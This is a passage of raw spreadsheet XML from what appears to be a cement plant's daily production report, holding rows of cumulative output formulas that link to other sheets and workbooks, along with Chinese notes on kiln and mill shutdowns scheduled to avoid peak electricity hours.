    <row r="48" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'30'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'30'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]31'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]31'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]31'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'29'!U48</f>
        <v>1032.38</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>7058.91</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]31'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'29'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]31'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'30'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'30'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]31'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]31'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]31'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'29'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]31'!$V$8</f>
        <v>697.36</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'29'!X49</f>
        <v>7126.9289</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>183657.2689</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]31'!$Y$8</f>
        <v>2743.32610000004</v>
      </c>
    </row>
    <row r="50" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'30'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'30'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]31'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]31'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]31'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'29'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]31'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'29'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]31'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]31'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]31'!$E$24</f>
        <v>5651</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'30'!H51</f>
        <v>135970</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1512369</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]31'!$I$24</f>
        <v>4405.233</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'30'!K51</f>
        <v>148811.205</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1511935.136</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]31'!$L$24</f>
        <v>35857.6689999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>79.6837088888885</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]31'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]31'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]31'!$R$30</f>
        <v>37.1599999999999</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'29'!U51</f>
        <v>5220.27</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>68218.741</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]31'!$V$30</f>
        <v>243</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'29'!X51</f>
        <v>5420.288</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>66036.525</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]31'!$Y$30</f>
        <v>3049.90200000001</v>
      </c>
    </row>
    <row r="52" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]31'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]31'!$E$19</f>
        <v>5548.73000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'30'!H52</f>
        <v>59740.1700000006</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1443307.42</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]31'!$I$19</f>
        <v>4446.77</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'30'!K52</f>
        <v>128644.818</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1410339.018</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]31'!$L$19</f>
        <v>36141.7950000508</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>24.925375862104</v>
      </c>
      <c r="O52" s="200"/>
      <c r="P52" s="244"/>
      <c r="Q52" s="193" t="s">
        <v>280</v>
      </c>
      <c r="R52" s="241"/>
      <c r="S52" s="233"/>
      <c r="T52" s="238"/>
      <c r="U52" s="234"/>
      <c r="V52" s="234"/>
      <c r="W52" s="235"/>
      <c r="X52" s="234"/>
      <c r="Y52" s="235"/>
      <c r="Z52" s="238"/>
    </row>
    <row r="53" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A53" s="191"/>
      <c r="B53" s="193"/>
      <c r="C53" s="193"/>
      <c r="D53" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E53" s="194"/>
      <c r="F53" s="194">
        <f>'[13]31'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]31'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'30'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]31'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'30'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]31'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]31'!$M$21+'[14]31'!$M$22+'[14]31'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]31'!$N$21+'[14]31'!$N$22+'[14]31'!$N$35</f>
        <v>44.5</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'29'!U53</f>
        <v>1306.77</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39641.197</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]31'!$Q$21+'[14]31'!$Q$22+'[14]31'!$Q$35</f>
        <v>62</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'29'!X53</f>
        <v>1060</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40551</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]31'!$T$21+'[14]31'!$T$22+'[14]31'!$T$35</f>
        <v>1923.117</v>
      </c>
    </row>
    <row r="54" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]31'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'30'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]31'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'30'!K54</f>
        <v>16730.398</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>228172.248</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]31'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]31'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]31'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]31'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'29'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]31'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'29'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]31'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]31'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'30'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]31'!$I$63</f>
        <v>136.77</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'30'!K55</f>
        <v>9194.742</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>44630.392</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]31'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]31'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]31'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]31'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]31'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]31'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]31'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]31'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]31'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'30'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'30'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]30'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：8:00-24:00避峰停机；2#磨：11:20-24:00避峰停机；3#磨：8:00-24:00避峰停机；4#磨：8:00-24:00避峰停机。</v>
      </c>
      <c r="R56" s="261"/>
      <c r="S56" s="261"/>
      <c r="T56" s="261"/>
      <c r="U56" s="261"/>
      <c r="V56" s="261"/>
      <c r="W56" s="261"/>
      <c r="X56" s="261"/>
      <c r="Y56" s="261"/>
      <c r="Z56" s="262"/>
    </row>
    <row r="57" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A57" s="191"/>
      <c r="B57" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C57" s="193"/>
      <c r="D57" s="193"/>
      <c r="E57" s="194">
        <v>160000</v>
      </c>
      <c r="F57" s="194"/>
      <c r="G57" s="225"/>
      <c r="H57" s="194">
        <f>G57+'30'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'30'!K57</f>
        <v>0</v>
      </c>
      <c r="L57" s="194">
        <f>K57+yc!L57</f>
        <v>0</v>
      </c>
      <c r="M57" s="194"/>
      <c r="N57" s="195"/>
      <c r="O57" s="263"/>
      <c r="P57" s="264"/>
      <c r="Q57" s="265"/>
      <c r="R57" s="266"/>
      <c r="S57" s="266"/>
      <c r="T57" s="266"/>
      <c r="U57" s="266"/>
      <c r="V57" s="266"/>
      <c r="W57" s="266"/>
      <c r="X57" s="266"/>
      <c r="Y57" s="266"/>
      <c r="Z57" s="267"/>
    </row>
    <row r="58" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A58" s="191"/>
      <c r="B58" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C58" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D58" s="193"/>
      <c r="E58" s="194"/>
      <c r="F58" s="194"/>
      <c r="G58" s="225"/>
      <c r="H58" s="194">
        <f>G58+'30'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'30'!K58</f>
        <v>0</v>
      </c>
      <c r="L58" s="194">
        <f>K58+yc!L58</f>
        <v>0</v>
      </c>
      <c r="M58" s="194"/>
      <c r="N58" s="195"/>
      <c r="O58" s="263"/>
      <c r="P58" s="264"/>
      <c r="Q58" s="268"/>
      <c r="R58" s="269"/>
      <c r="S58" s="269"/>
      <c r="T58" s="269"/>
      <c r="U58" s="269"/>
      <c r="V58" s="269"/>
      <c r="W58" s="269"/>
      <c r="X58" s="269"/>
      <c r="Y58" s="269"/>
      <c r="Z58" s="270"/>
    </row>
    <row r="59" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A59" s="191"/>
      <c r="B59" s="191"/>
      <c r="C59" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D59" s="193"/>
      <c r="E59" s="194"/>
      <c r="F59" s="194"/>
      <c r="G59" s="194"/>
      <c r="H59" s="194">
        <f>G59+'30'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'30'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]30'!$Q$65</f>
        <v>窑:错峰续停。A组磨：8:00-24:00避峰停机。D1#磨：8:00-24:00避峰停机，D2#磨：8:00-24:00避峰停机。</v>
      </c>
      <c r="R59" s="272"/>
      <c r="S59" s="272"/>
      <c r="T59" s="272"/>
      <c r="U59" s="272"/>
      <c r="V59" s="272"/>
      <c r="W59" s="272"/>
      <c r="X59" s="272"/>
      <c r="Y59" s="272"/>
      <c r="Z59" s="273"/>
    </row>
    <row r="60" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A60" s="191"/>
      <c r="B60" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C60" s="193"/>
      <c r="D60" s="193"/>
      <c r="E60" s="194"/>
      <c r="F60" s="194"/>
      <c r="G60" s="225"/>
      <c r="H60" s="194">
        <f>G60+'30'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'30'!K60</f>
        <v>0</v>
      </c>
      <c r="L60" s="194">
        <f>K60+yc!L60</f>
        <v>0</v>
      </c>
      <c r="M60" s="194"/>
      <c r="N60" s="195"/>
      <c r="O60" s="263"/>
      <c r="P60" s="264"/>
      <c r="Q60" s="265"/>
      <c r="R60" s="266"/>
      <c r="S60" s="266"/>
      <c r="T60" s="266"/>
      <c r="U60" s="266"/>
      <c r="V60" s="266"/>
      <c r="W60" s="266"/>
      <c r="X60" s="266"/>
      <c r="Y60" s="266"/>
      <c r="Z60" s="267"/>
    </row>
    <row r="61" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A61" s="191" t="s">
        <v>262</v>
      </c>
      <c r="B61" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C61" s="193"/>
      <c r="D61" s="193"/>
      <c r="E61" s="194">
        <v>120000</v>
      </c>
      <c r="F61" s="194">
        <f>'[14]31'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]31'!$E$6</f>
        <v>3589</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'30'!H61</f>
        <v>122026</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1237899</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]31'!$E$21</f>
        <v>3641.66</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'30'!K61</f>
        <v>122182</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1223342.08</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]31'!$H$6</f>
        <v>37613.1699999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>72.333019230769</v>
      </c>
      <c r="O61" s="263"/>
      <c r="P61" s="264"/>
      <c r="Q61" s="268"/>
      <c r="R61" s="269"/>
      <c r="S61" s="269"/>
      <c r="T61" s="269"/>
      <c r="U61" s="269"/>
      <c r="V61" s="269"/>
      <c r="W61" s="269"/>
      <c r="X61" s="269"/>
      <c r="Y61" s="269"/>
      <c r="Z61" s="270"/>
    </row>
    <row r="62" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A62" s="191"/>
      <c r="B62" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C62" s="193"/>
      <c r="D62" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E62" s="194"/>
      <c r="F62" s="194">
        <f>'[14]31'!$M$11+'[14]31'!$M$12+'[14]31'!$M$13+'[14]31'!$M$14+'[14]31'!$M$15+'[14]31'!$M$16+'[14]31'!$M$17+'[14]31'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]31'!$N$11+'[14]31'!$N$12+'[14]31'!$N$13+'[14]31'!$N$14+'[14]31'!$N$15+'[14]31'!$N$16+'[14]31'!$N$17+'[14]31'!$N$18</f>
        <v>2747</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'30'!H62</f>
        <v>85559</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>921552.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]31'!$Q$11+'[14]31'!$Q$12+'[14]31'!$Q$13+'[14]31'!$Q$14+'[14]31'!$Q$15+'[14]31'!$Q$16+'[14]31'!$Q$17+'[14]31'!$Q$18</f>
        <v>2632</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'30'!K62</f>
        <v>87861</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>922333.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]31'!$T$11+'[14]31'!$T$12+'[14]31'!$T$13+'[14]31'!$T$14+'[14]31'!$T$15+'[14]31'!$T$16+'[14]31'!$T$17+'[14]31'!$T$18</f>
        <v>16152.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>64.6105359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]30'!$Q$71</f>
        <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]31'!$M$19+'[14]31'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]31'!$N$19+'[14]31'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'30'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]31'!$Q$19+'[14]31'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'30'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]31'!$T$19+'[14]31'!$T$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N63" s="212"/>
      <c r="O63" s="263"/>
      <c r="P63" s="275"/>
      <c r="Q63" s="265"/>
      <c r="R63" s="266"/>
      <c r="S63" s="266"/>
      <c r="T63" s="266"/>
      <c r="U63" s="266"/>
      <c r="V63" s="266"/>
      <c r="W63" s="266"/>
      <c r="X63" s="266"/>
      <c r="Y63" s="266"/>
      <c r="Z63" s="267"/>
    </row>
    <row r="64" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A64" s="191"/>
      <c r="B64" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C64" s="193"/>
      <c r="D64" s="193"/>
      <c r="E64" s="194"/>
      <c r="F64" s="194"/>
      <c r="G64" s="225"/>
      <c r="H64" s="194">
        <f>G64+'30'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'30'!K64</f>
        <v>0</v>
      </c>
      <c r="L64" s="194">
        <f>K64+yc!L64</f>
        <v>0</v>
      </c>
      <c r="M64" s="194"/>
      <c r="N64" s="195"/>
      <c r="O64" s="263"/>
      <c r="P64" s="276"/>
      <c r="Q64" s="268"/>
      <c r="R64" s="269"/>
      <c r="S64" s="269"/>
      <c r="T64" s="269"/>
      <c r="U64" s="269"/>
      <c r="V64" s="269"/>
      <c r="W64" s="269"/>
      <c r="X64" s="269"/>
      <c r="Y64" s="269"/>
      <c r="Z64" s="270"/>
    </row>
    <row r="65" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A65" s="191"/>
      <c r="B65" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C65" s="193"/>
      <c r="D65" s="193"/>
      <c r="E65" s="194">
        <v>120000</v>
      </c>
      <c r="F65" s="194"/>
      <c r="G65" s="225"/>
      <c r="H65" s="194">
        <f>G65+'30'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'30'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]30'!$Q$74</f>
        <v>1#窑:续停；2#窑:正常；1#磨:14:30-22:30避峰停机。2#磨:14:30-23:20避峰停机。3#磨:14:30-22:30避峰停机。</v>
      </c>
      <c r="R65" s="272"/>
      <c r="S65" s="272"/>
      <c r="T65" s="272"/>
      <c r="U65" s="272"/>
      <c r="V65" s="272"/>
      <c r="W65" s="272"/>
      <c r="X65" s="272"/>
      <c r="Y65" s="272"/>
      <c r="Z65" s="273"/>
    </row>
    <row r="66" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A66" s="191"/>
      <c r="B66" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C66" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D66" s="193"/>
      <c r="E66" s="194"/>
      <c r="F66" s="194"/>
